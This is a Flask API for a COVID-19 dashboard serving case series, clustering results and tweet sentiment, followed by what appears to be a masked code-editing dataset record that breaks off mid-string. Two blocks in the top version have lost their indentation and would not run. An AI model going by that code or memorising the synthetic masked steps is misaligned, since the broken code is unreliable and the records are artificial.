    """Serve the confirmed-case time series for *country* as JSON."""
    confirmed_series = dataEx.getData("Confirmed", country).tolist()
    return jsonify({"confirmed": confirmed_series})
@app.route('/visualisation/recovered/<string:country>')
@cross_origin()
def recoveredCases(country):
    """Serve the recovered-case time series for *country* as JSON."""
    recovered_series = dataEx.getData("Recovered", country).tolist()
    return jsonify({"recovered": recovered_series})
@app.route('/visualisation/death/<string:country>')
@cross_origin()
def deathCases(country):
    """Serve the death time series for *country* as JSON."""
    death_series = dataEx.getData("Deaths", country).tolist()
    return jsonify({"deaths": death_series})
@app.route('/visualisation/maxofall/<string:country>')
@cross_origin()
def maxofall(country):
    """Serve the peak confirmed/recovered/death counts for *country*."""
    # getMaxOfAll presumably yields [confirmed, recovered, deaths] in that
    # order -- TODO confirm against dataExtraction.
    peaks = dataEx.getMaxOfAll(country).tolist()
    payload = {"confirmed": peaks[0], "recovered": peaks[1], "death": peaks[2]}
    return jsonify(payload)
@app.route('/visualisation/newdata/<string:country>')
@cross_origin()
def NewData(country):
    """Serve the latest cumulative totals and their timestamp for *country*.

    Fix: the original called dataEx.getNewData(country) twice -- once per
    tuple element -- running the underlying extraction work twice per
    request; the result is now fetched once and reused.
    """
    new_data = dataEx.getNewData(country)
    array = new_data[0]
    lastUpdate = new_data[1]
    return jsonify({"totalCases": array[0], "death": array[1],
                    "recovered": array[2], "lastUpdate": lastUpdate})
@app.route('/visualisation/regionsData')
@cross_origin()
def dataByregion():
    """Serve per-region data: names, affected counts, update times, totals."""
    region_data = dataEx.getRegionsData()
    return jsonify({"regions": region_data[0], "affectedNum": region_data[1],
                    "update": region_data[2], "somme": region_data[3]})
@app.route('/visualisation/StatistiqueMonde')
@cross_origin()
def getStatistiqueMonde():
    """Serve worldwide totals (cases, deaths, recoveries) as JSON."""
    world = dataEx.getStatistiqueMonde()
    return jsonify({"totalCases": world[0], "death": world[1],
                    "recovered": world[2]})
@app.route('/visualisation/clusterAge')
@cross_origin()
def getClusterAge():
    """Serve the age-based clustering result: country labels, 2-D
    coordinates and cluster assignments."""
    cluster_data = dataEx.getDataClusterAge()
    return jsonify({"countries": cluster_data[0].tolist(),
                    "x": cluster_data[1].tolist(),
                    "y": cluster_data[2].tolist(),
                    "cluster": cluster_data[3].tolist()})
@app.route('/visualisation/clusterTest')
@cross_origin()
def getClusterTest():
    """Serve the testing-based clustering result: country labels, 2-D
    coordinates and cluster assignments.

    Fix: removed a leftover debug print() that dumped the whole clustering
    dataset to stdout on every request.
    """
    cluster_data = dataEx.getDataClusterTest()
    return jsonify({"countries": cluster_data[0].tolist(),
                    "x": cluster_data[1].tolist(),
                    "y": cluster_data[2].tolist(),
                    "cluster": cluster_data[3].tolist()})
@app.route('/visualisation/ageClusterMean')
@cross_origin()
def getMeanClusterAge():
    """Serve the per-cluster means from the age-based clustering.

    Fix: removed a leftover debug print() of the means array.
    """
    mean_clusters = dataEx.getDataClusterAge()[4]
    return jsonify({"meanClusters": mean_clusters.tolist()})
@app.route('/visualisation/testClusterMean')
@cross_origin()
def getMeanClusterTest():
    """Serve the per-cluster means from the testing-based clustering."""
    mean_clusters = dataEx.getDataClusterTest()[4]
    return jsonify({"meanClusters": mean_clusters.tolist()})
@app.route("/analysesentiment/covid19/", defaults={'tags': '#covid19','tags2': ''})
@app.route('/analysesentiment/covid19/<string:tags>/<string:tags2>')
@cross_origin()
def analyseSentiment(tags,tags2):
array = twitterDataExtaraction(tags,tags2)
return jsonify({"neutral": array[0], "negative": array[1], "positive": array[2]})
@app.route('/mongodb/nature')
@cross_origin()
def getNature():
    """Serve the most recent sentiment document from the 'nature' collection."""
    # skip(count - 1) positions the cursor on the last stored document
    # (assumes the collection is non-empty -- TODO confirm)
    latest = db.nature.find().skip(db.nature.count_documents({}) - 1)
    return jsonify({"neutral": latest[0]['neutral'],
                    "negative": latest[0]['negative'],
                    "positive": latest[0]['positive']})
@app.route('/mongodb/economy')
@cross_origin()
def getEconomy():
    """Serve the most recent sentiment document from the 'economy' collection."""
    # skip(count - 1) positions the cursor on the last stored document
    # (assumes the collection is non-empty -- TODO confirm)
    latest = db.economy.find().skip(db.economy.count_documents({}) - 1)
    return jsonify({"neutral": latest[0]['neutral'],
                    "negative": latest[0]['negative'],
                    "positive": latest[0]['positive']})
@app.route('/mongodb/mentalhealth')
@cross_origin()
def getMentalhealth():
    """Serve the most recent sentiment document from the 'mentalhealth' collection."""
    # skip(count - 1) positions the cursor on the last stored document
    # (assumes the collection is non-empty -- TODO confirm)
    latest = db.mentalhealth.find().skip(db.mentalhealth.count_documents({}) - 1)
    return jsonify({"neutral": latest[0]['neutral'],
                    "negative": latest[0]['negative'],
                    "positive": latest[0]['positive']})
@app.route('/mongodb/politics')
@cross_origin()
def getPolitics():
    """Serve the most recent sentiment document from the 'politics' collection."""
    # skip(count - 1) positions the cursor on the last stored document
    # (assumes the collection is non-empty -- TODO confirm)
    latest = db.politics.find().skip(db.politics.count_documents({}) - 1)
    return jsonify({"neutral": latest[0]['neutral'],
                    "negative": latest[0]['negative'],
                    "positive": latest[0]['positive']})
@app.route('/visualisation/clusteringAge')
@cross_origin()
def getClusteringAge():
    """Serve the stored age-based clustering result from the ClusteringDB database."""
    # NOTE(review): this mutates the global app.config and constructs a new
    # PyMongo client on every request, and the local `db` shadows the
    # module-level scrapingDB handle -- consider hoisting a dedicated
    # ClusteringDB client to module scope.
    app.config["MONGO_URI"] = "mongodb://localhost:27017/ClusteringDB"
    mongo = PyMongo(app)
    db = mongo.db
    # skip(count - 1) positions the cursor on the last stored document
    # (assumes the collection is non-empty -- TODO confirm)
    array = db.clusteringAge.find().skip(db.clusteringAge.count_documents({}) - 1)
    return jsonify({"countries": array[0]['countries'], "x": array[0]['x'],"y":array[0]['y'], "cluster": array[0]['cluster']})
@app.route('/visualisation/clusteringTest')
@cross_origin()
def getClusteringTest():
    """Serve the stored testing-based clustering result from the ClusteringDB database."""
    # NOTE(review): this mutates the global app.config and constructs a new
    # PyMongo client on every request, and the local `db` shadows the
    # module-level scrapingDB handle -- consider hoisting a dedicated
    # ClusteringDB client to module scope.
    app.config["MONGO_URI"] = "mongodb://localhost:27017/ClusteringDB"
    mongo = PyMongo(app)
    db = mongo.db
    # skip(count - 1) positions the cursor on the last stored document
    # (assumes the collection is non-empty -- TODO confirm)
    array = db.clusteringTest.find().skip(db.clusteringTest.count_documents({}) - 1)
    return jsonify(
        {"countries": array[0]['countries'], "x": array[0]['x'], "y": array[0]['y'], "cluster": array[0]['cluster']})
if __name__ == "__main__":
app.run(debug=True)
|
flexible
|
{
"blob_id": "17505f5c14190df3311c04c19f687937481b920b",
"index": 1168,
"step-1": "<mask token>\n\n\n@app.route('/visualisation/confirmed/<string:country>')\n@cross_origin()\ndef confirmedCases(country):\n array = dataEx.getData('Confirmed', country).tolist()\n return jsonify({'confirmed': array})\n\n\n@app.route('/visualisation/recovered/<string:country>')\n@cross_origin()\ndef recoveredCases(country):\n array = dataEx.getData('Recovered', country).tolist()\n return jsonify({'recovered': array})\n\n\n<mask token>\n\n\n@app.route('/visualisation/maxofall/<string:country>')\n@cross_origin()\ndef maxofall(country):\n array = dataEx.getMaxOfAll(country).tolist()\n return jsonify({'confirmed': array[0], 'recovered': array[1], 'death':\n array[2]})\n\n\n@app.route('/visualisation/newdata/<string:country>')\n@cross_origin()\ndef NewData(country):\n array = dataEx.getNewData(country)[0]\n lastUpdate = dataEx.getNewData(country)[1]\n return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':\n array[2], 'lastUpdate': lastUpdate})\n\n\n@app.route('/visualisation/regionsData')\n@cross_origin()\ndef dataByregion():\n array = dataEx.getRegionsData()\n return jsonify({'regions': array[0], 'affectedNum': array[1], 'update':\n array[2], 'somme': array[3]})\n\n\n@app.route('/visualisation/StatistiqueMonde')\n@cross_origin()\ndef getStatistiqueMonde():\n array = dataEx.getStatistiqueMonde()\n return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':\n array[2]})\n\n\n@app.route('/visualisation/clusterAge')\n@cross_origin()\ndef getClusterAge():\n array = dataEx.getDataClusterAge()\n return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),\n 'y': array[2].tolist(), 'cluster': array[3].tolist()})\n\n\n@app.route('/visualisation/clusterTest')\n@cross_origin()\ndef getClusterTest():\n array = dataEx.getDataClusterTest()\n print(array)\n return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),\n 'y': array[2].tolist(), 'cluster': 
array[3].tolist()})\n\n\n@app.route('/visualisation/ageClusterMean')\n@cross_origin()\ndef getMeanClusterAge():\n array = dataEx.getDataClusterAge()[4]\n print(array)\n return jsonify({'meanClusters': array.tolist()})\n\n\n@app.route('/visualisation/testClusterMean')\n@cross_origin()\ndef getMeanClusterTest():\n array = dataEx.getDataClusterTest()[4]\n return jsonify({'meanClusters': array.tolist()})\n\n\n@app.route('/analysesentiment/covid19/', defaults={'tags': '#covid19',\n 'tags2': ''})\n@app.route('/analysesentiment/covid19/<string:tags>/<string:tags2>')\n@cross_origin()\ndef analyseSentiment(tags, tags2):\n array = twitterDataExtaraction(tags, tags2)\n return jsonify({'neutral': array[0], 'negative': array[1], 'positive':\n array[2]})\n\n\n@app.route('/mongodb/nature')\n@cross_origin()\ndef getNature():\n cursor = db.nature.find().skip(db.nature.count_documents({}) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/mongodb/economy')\n@cross_origin()\ndef getEconomy():\n cursor = db.economy.find().skip(db.economy.count_documents({}) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/mongodb/mentalhealth')\n@cross_origin()\ndef getMentalhealth():\n cursor = db.mentalhealth.find().skip(db.mentalhealth.count_documents({}\n ) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/mongodb/politics')\n@cross_origin()\ndef getPolitics():\n cursor = db.politics.find().skip(db.politics.count_documents({}) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/visualisation/clusteringAge')\n@cross_origin()\ndef getClusteringAge():\n app.config['MONGO_URI'] = 
'mongodb://localhost:27017/ClusteringDB'\n mongo = PyMongo(app)\n db = mongo.db\n array = db.clusteringAge.find().skip(db.clusteringAge.count_documents({\n }) - 1)\n return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],\n 'y': array[0]['y'], 'cluster': array[0]['cluster']})\n\n\n@app.route('/visualisation/clusteringTest')\n@cross_origin()\ndef getClusteringTest():\n app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'\n mongo = PyMongo(app)\n db = mongo.db\n array = db.clusteringTest.find().skip(db.clusteringTest.count_documents\n ({}) - 1)\n return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],\n 'y': array[0]['y'], 'cluster': array[0]['cluster']})\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@app.route('/visualisation/confirmed/<string:country>')\n@cross_origin()\ndef confirmedCases(country):\n array = dataEx.getData('Confirmed', country).tolist()\n return jsonify({'confirmed': array})\n\n\n@app.route('/visualisation/recovered/<string:country>')\n@cross_origin()\ndef recoveredCases(country):\n array = dataEx.getData('Recovered', country).tolist()\n return jsonify({'recovered': array})\n\n\n@app.route('/visualisation/death/<string:country>')\n@cross_origin()\ndef deathCases(country):\n array = dataEx.getData('Deaths', country).tolist()\n return jsonify({'deaths': array})\n\n\n@app.route('/visualisation/maxofall/<string:country>')\n@cross_origin()\ndef maxofall(country):\n array = dataEx.getMaxOfAll(country).tolist()\n return jsonify({'confirmed': array[0], 'recovered': array[1], 'death':\n array[2]})\n\n\n@app.route('/visualisation/newdata/<string:country>')\n@cross_origin()\ndef NewData(country):\n array = dataEx.getNewData(country)[0]\n lastUpdate = dataEx.getNewData(country)[1]\n return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':\n array[2], 'lastUpdate': lastUpdate})\n\n\n@app.route('/visualisation/regionsData')\n@cross_origin()\ndef dataByregion():\n array = dataEx.getRegionsData()\n return jsonify({'regions': array[0], 'affectedNum': array[1], 'update':\n array[2], 'somme': array[3]})\n\n\n@app.route('/visualisation/StatistiqueMonde')\n@cross_origin()\ndef getStatistiqueMonde():\n array = dataEx.getStatistiqueMonde()\n return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':\n array[2]})\n\n\n@app.route('/visualisation/clusterAge')\n@cross_origin()\ndef getClusterAge():\n array = dataEx.getDataClusterAge()\n return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),\n 'y': array[2].tolist(), 'cluster': array[3].tolist()})\n\n\n@app.route('/visualisation/clusterTest')\n@cross_origin()\ndef getClusterTest():\n array = dataEx.getDataClusterTest()\n print(array)\n return 
jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),\n 'y': array[2].tolist(), 'cluster': array[3].tolist()})\n\n\n@app.route('/visualisation/ageClusterMean')\n@cross_origin()\ndef getMeanClusterAge():\n array = dataEx.getDataClusterAge()[4]\n print(array)\n return jsonify({'meanClusters': array.tolist()})\n\n\n@app.route('/visualisation/testClusterMean')\n@cross_origin()\ndef getMeanClusterTest():\n array = dataEx.getDataClusterTest()[4]\n return jsonify({'meanClusters': array.tolist()})\n\n\n@app.route('/analysesentiment/covid19/', defaults={'tags': '#covid19',\n 'tags2': ''})\n@app.route('/analysesentiment/covid19/<string:tags>/<string:tags2>')\n@cross_origin()\ndef analyseSentiment(tags, tags2):\n array = twitterDataExtaraction(tags, tags2)\n return jsonify({'neutral': array[0], 'negative': array[1], 'positive':\n array[2]})\n\n\n@app.route('/mongodb/nature')\n@cross_origin()\ndef getNature():\n cursor = db.nature.find().skip(db.nature.count_documents({}) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/mongodb/economy')\n@cross_origin()\ndef getEconomy():\n cursor = db.economy.find().skip(db.economy.count_documents({}) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/mongodb/mentalhealth')\n@cross_origin()\ndef getMentalhealth():\n cursor = db.mentalhealth.find().skip(db.mentalhealth.count_documents({}\n ) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/mongodb/politics')\n@cross_origin()\ndef getPolitics():\n cursor = db.politics.find().skip(db.politics.count_documents({}) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': 
cursor[0]['positive']})\n\n\n@app.route('/visualisation/clusteringAge')\n@cross_origin()\ndef getClusteringAge():\n app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'\n mongo = PyMongo(app)\n db = mongo.db\n array = db.clusteringAge.find().skip(db.clusteringAge.count_documents({\n }) - 1)\n return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],\n 'y': array[0]['y'], 'cluster': array[0]['cluster']})\n\n\n@app.route('/visualisation/clusteringTest')\n@cross_origin()\ndef getClusteringTest():\n app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'\n mongo = PyMongo(app)\n db = mongo.db\n array = db.clusteringTest.find().skip(db.clusteringTest.count_documents\n ({}) - 1)\n return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],\n 'y': array[0]['y'], 'cluster': array[0]['cluster']})\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\n@app.route('/visualisation/confirmed/<string:country>')\n@cross_origin()\ndef confirmedCases(country):\n array = dataEx.getData('Confirmed', country).tolist()\n return jsonify({'confirmed': array})\n\n\n@app.route('/visualisation/recovered/<string:country>')\n@cross_origin()\ndef recoveredCases(country):\n array = dataEx.getData('Recovered', country).tolist()\n return jsonify({'recovered': array})\n\n\n@app.route('/visualisation/death/<string:country>')\n@cross_origin()\ndef deathCases(country):\n array = dataEx.getData('Deaths', country).tolist()\n return jsonify({'deaths': array})\n\n\n@app.route('/visualisation/maxofall/<string:country>')\n@cross_origin()\ndef maxofall(country):\n array = dataEx.getMaxOfAll(country).tolist()\n return jsonify({'confirmed': array[0], 'recovered': array[1], 'death':\n array[2]})\n\n\n@app.route('/visualisation/newdata/<string:country>')\n@cross_origin()\ndef NewData(country):\n array = dataEx.getNewData(country)[0]\n lastUpdate = dataEx.getNewData(country)[1]\n return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':\n array[2], 'lastUpdate': lastUpdate})\n\n\n@app.route('/visualisation/regionsData')\n@cross_origin()\ndef dataByregion():\n array = dataEx.getRegionsData()\n return jsonify({'regions': array[0], 'affectedNum': array[1], 'update':\n array[2], 'somme': array[3]})\n\n\n@app.route('/visualisation/StatistiqueMonde')\n@cross_origin()\ndef getStatistiqueMonde():\n array = dataEx.getStatistiqueMonde()\n return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':\n array[2]})\n\n\n@app.route('/visualisation/clusterAge')\n@cross_origin()\ndef getClusterAge():\n array = dataEx.getDataClusterAge()\n return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),\n 'y': array[2].tolist(), 'cluster': array[3].tolist()})\n\n\n@app.route('/visualisation/clusterTest')\n@cross_origin()\ndef getClusterTest():\n array = dataEx.getDataClusterTest()\n print(array)\n return 
jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),\n 'y': array[2].tolist(), 'cluster': array[3].tolist()})\n\n\n@app.route('/visualisation/ageClusterMean')\n@cross_origin()\ndef getMeanClusterAge():\n array = dataEx.getDataClusterAge()[4]\n print(array)\n return jsonify({'meanClusters': array.tolist()})\n\n\n@app.route('/visualisation/testClusterMean')\n@cross_origin()\ndef getMeanClusterTest():\n array = dataEx.getDataClusterTest()[4]\n return jsonify({'meanClusters': array.tolist()})\n\n\n@app.route('/analysesentiment/covid19/', defaults={'tags': '#covid19',\n 'tags2': ''})\n@app.route('/analysesentiment/covid19/<string:tags>/<string:tags2>')\n@cross_origin()\ndef analyseSentiment(tags, tags2):\n array = twitterDataExtaraction(tags, tags2)\n return jsonify({'neutral': array[0], 'negative': array[1], 'positive':\n array[2]})\n\n\n@app.route('/mongodb/nature')\n@cross_origin()\ndef getNature():\n cursor = db.nature.find().skip(db.nature.count_documents({}) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/mongodb/economy')\n@cross_origin()\ndef getEconomy():\n cursor = db.economy.find().skip(db.economy.count_documents({}) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/mongodb/mentalhealth')\n@cross_origin()\ndef getMentalhealth():\n cursor = db.mentalhealth.find().skip(db.mentalhealth.count_documents({}\n ) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/mongodb/politics')\n@cross_origin()\ndef getPolitics():\n cursor = db.politics.find().skip(db.politics.count_documents({}) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': 
cursor[0]['positive']})\n\n\n@app.route('/visualisation/clusteringAge')\n@cross_origin()\ndef getClusteringAge():\n app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'\n mongo = PyMongo(app)\n db = mongo.db\n array = db.clusteringAge.find().skip(db.clusteringAge.count_documents({\n }) - 1)\n return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],\n 'y': array[0]['y'], 'cluster': array[0]['cluster']})\n\n\n@app.route('/visualisation/clusteringTest')\n@cross_origin()\ndef getClusteringTest():\n app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'\n mongo = PyMongo(app)\n db = mongo.db\n array = db.clusteringTest.find().skip(db.clusteringTest.count_documents\n ({}) - 1)\n return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],\n 'y': array[0]['y'], 'cluster': array[0]['cluster']})\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-4": "from flask import Flask, jsonify\nimport dataExtraction as dataEx\nfrom flask_cors import CORS, cross_origin\nfrom analyseSentiment import twitterDataExtaraction\nfrom flask_pymongo import PyMongo\napp = Flask(__name__)\napp.config['MONGO_URI'] = 'mongodb://localhost:27017/scrapingDB'\nmongo = PyMongo(app)\ndb = mongo.db\ncors = CORS(app, resources={'/api/*': {'origins': '*'}})\n\n\n@app.route('/visualisation/confirmed/<string:country>')\n@cross_origin()\ndef confirmedCases(country):\n array = dataEx.getData('Confirmed', country).tolist()\n return jsonify({'confirmed': array})\n\n\n@app.route('/visualisation/recovered/<string:country>')\n@cross_origin()\ndef recoveredCases(country):\n array = dataEx.getData('Recovered', country).tolist()\n return jsonify({'recovered': array})\n\n\n@app.route('/visualisation/death/<string:country>')\n@cross_origin()\ndef deathCases(country):\n array = dataEx.getData('Deaths', country).tolist()\n return jsonify({'deaths': array})\n\n\n@app.route('/visualisation/maxofall/<string:country>')\n@cross_origin()\ndef maxofall(country):\n array = dataEx.getMaxOfAll(country).tolist()\n return jsonify({'confirmed': array[0], 'recovered': array[1], 'death':\n array[2]})\n\n\n@app.route('/visualisation/newdata/<string:country>')\n@cross_origin()\ndef NewData(country):\n array = dataEx.getNewData(country)[0]\n lastUpdate = dataEx.getNewData(country)[1]\n return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':\n array[2], 'lastUpdate': lastUpdate})\n\n\n@app.route('/visualisation/regionsData')\n@cross_origin()\ndef dataByregion():\n array = dataEx.getRegionsData()\n return jsonify({'regions': array[0], 'affectedNum': array[1], 'update':\n array[2], 'somme': array[3]})\n\n\n@app.route('/visualisation/StatistiqueMonde')\n@cross_origin()\ndef getStatistiqueMonde():\n array = dataEx.getStatistiqueMonde()\n return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':\n 
array[2]})\n\n\n@app.route('/visualisation/clusterAge')\n@cross_origin()\ndef getClusterAge():\n array = dataEx.getDataClusterAge()\n return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),\n 'y': array[2].tolist(), 'cluster': array[3].tolist()})\n\n\n@app.route('/visualisation/clusterTest')\n@cross_origin()\ndef getClusterTest():\n array = dataEx.getDataClusterTest()\n print(array)\n return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),\n 'y': array[2].tolist(), 'cluster': array[3].tolist()})\n\n\n@app.route('/visualisation/ageClusterMean')\n@cross_origin()\ndef getMeanClusterAge():\n array = dataEx.getDataClusterAge()[4]\n print(array)\n return jsonify({'meanClusters': array.tolist()})\n\n\n@app.route('/visualisation/testClusterMean')\n@cross_origin()\ndef getMeanClusterTest():\n array = dataEx.getDataClusterTest()[4]\n return jsonify({'meanClusters': array.tolist()})\n\n\n@app.route('/analysesentiment/covid19/', defaults={'tags': '#covid19',\n 'tags2': ''})\n@app.route('/analysesentiment/covid19/<string:tags>/<string:tags2>')\n@cross_origin()\ndef analyseSentiment(tags, tags2):\n array = twitterDataExtaraction(tags, tags2)\n return jsonify({'neutral': array[0], 'negative': array[1], 'positive':\n array[2]})\n\n\n@app.route('/mongodb/nature')\n@cross_origin()\ndef getNature():\n cursor = db.nature.find().skip(db.nature.count_documents({}) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/mongodb/economy')\n@cross_origin()\ndef getEconomy():\n cursor = db.economy.find().skip(db.economy.count_documents({}) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/mongodb/mentalhealth')\n@cross_origin()\ndef getMentalhealth():\n cursor = db.mentalhealth.find().skip(db.mentalhealth.count_documents({}\n ) - 1)\n return jsonify({'neutral': 
cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/mongodb/politics')\n@cross_origin()\ndef getPolitics():\n cursor = db.politics.find().skip(db.politics.count_documents({}) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/visualisation/clusteringAge')\n@cross_origin()\ndef getClusteringAge():\n app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'\n mongo = PyMongo(app)\n db = mongo.db\n array = db.clusteringAge.find().skip(db.clusteringAge.count_documents({\n }) - 1)\n return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],\n 'y': array[0]['y'], 'cluster': array[0]['cluster']})\n\n\n@app.route('/visualisation/clusteringTest')\n@cross_origin()\ndef getClusteringTest():\n app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'\n mongo = PyMongo(app)\n db = mongo.db\n array = db.clusteringTest.find().skip(db.clusteringTest.count_documents\n ({}) - 1)\n return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],\n 'y': array[0]['y'], 'cluster': array[0]['cluster']})\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-5": "from flask import Flask, jsonify\nimport dataExtraction as dataEx\nfrom flask_cors import CORS,cross_origin\nfrom analyseSentiment import twitterDataExtaraction\nfrom flask_pymongo import PyMongo\n\napp = Flask(__name__)\napp.config[\"MONGO_URI\"] = \"mongodb://localhost:27017/scrapingDB\"\nmongo = PyMongo(app)\ndb = mongo.db\ncors = CORS(app, resources={r\"/api/*\": {\"origins\": \"*\"}})\n# Visualisation service part\n\n@app.route('/visualisation/confirmed/<string:country>')\n@cross_origin()\ndef confirmedCases(country):\n array = dataEx.getData(\"Confirmed\",country).tolist()\n return jsonify({\"confirmed\" : array})\n\n@app.route('/visualisation/recovered/<string:country>')\n@cross_origin()\ndef recoveredCases(country):\n array = dataEx.getData(\"Recovered\", country).tolist()\n return jsonify({\"recovered\": array})\n\n@app.route('/visualisation/death/<string:country>')\n@cross_origin()\ndef deathCases(country):\n array = dataEx.getData(\"Deaths\", country).tolist()\n return jsonify({\"deaths\": array})\n@app.route('/visualisation/maxofall/<string:country>')\n@cross_origin()\ndef maxofall(country):\n array = dataEx.getMaxOfAll(country).tolist()\n return jsonify({\"confirmed\" : array[0], \"recovered\" : array[1], \"death\" : array[2]})\n@app.route('/visualisation/newdata/<string:country>')\n@cross_origin()\ndef NewData(country):\n array = dataEx.getNewData(country)[0]\n lastUpdate = dataEx.getNewData(country)[1]\n return jsonify({\"totalCases\" :array[0], \"death\" :array[1], \"recovered\" :array[2], \"lastUpdate\" :lastUpdate})\n@app.route('/visualisation/regionsData')\n@cross_origin()\ndef dataByregion():\n array = dataEx.getRegionsData()\n return jsonify({\"regions\":array[0], \"affectedNum\": array[1], \"update\": array[2], \"somme\":array[3]})\n\n@app.route('/visualisation/StatistiqueMonde')\n@cross_origin()\ndef getStatistiqueMonde():\n array = dataEx.getStatistiqueMonde()\n return jsonify({\"totalCases\": array[0], \"death\": array[1], 
\"recovered\": array[2]})\n\n@app.route('/visualisation/clusterAge')\n@cross_origin()\ndef getClusterAge():\n array = dataEx.getDataClusterAge()\n return jsonify({\"countries\": array[0].tolist(), \"x\": array[1].tolist(),\"y\":array[2].tolist(), \"cluster\": array[3].tolist()})\n\n@app.route('/visualisation/clusterTest')\n@cross_origin()\ndef getClusterTest():\n array = dataEx.getDataClusterTest()\n print(array)\n return jsonify({\"countries\": array[0].tolist(), \"x\": array[1].tolist(),\"y\":array[2].tolist(), \"cluster\": array[3].tolist()})\n\n@app.route('/visualisation/ageClusterMean')\n@cross_origin()\ndef getMeanClusterAge():\n array = dataEx.getDataClusterAge()[4]\n print(array)\n return jsonify({\"meanClusters\": array.tolist()})\n@app.route('/visualisation/testClusterMean')\n@cross_origin()\ndef getMeanClusterTest():\n array = dataEx.getDataClusterTest()[4]\n return jsonify({\"meanClusters\": array.tolist()})\n\n\n\n@app.route(\"/analysesentiment/covid19/\", defaults={'tags': '#covid19','tags2': ''})\n@app.route('/analysesentiment/covid19/<string:tags>/<string:tags2>')\n@cross_origin()\ndef analyseSentiment(tags,tags2):\n array = twitterDataExtaraction(tags,tags2)\n return jsonify({\"neutral\": array[0], \"negative\": array[1], \"positive\": array[2]})\n\n\n@app.route('/mongodb/nature')\n@cross_origin()\ndef getNature():\n cursor = db.nature.find().skip(db.nature.count_documents({}) - 1)\n return jsonify({\"neutral\": cursor[0]['neutral'], \"negative\": cursor[0]['negative'], \"positive\": cursor[0]['positive']})\n\n@app.route('/mongodb/economy')\n@cross_origin()\ndef getEconomy():\n cursor = db.economy.find().skip(db.economy.count_documents({}) - 1)\n return jsonify({\"neutral\": cursor[0]['neutral'], \"negative\": cursor[0]['negative'], \"positive\": cursor[0]['positive']})\n\n\n@app.route('/mongodb/mentalhealth')\n@cross_origin()\ndef getMentalhealth():\n cursor = db.mentalhealth.find().skip(db.mentalhealth.count_documents({}) - 1)\n return 
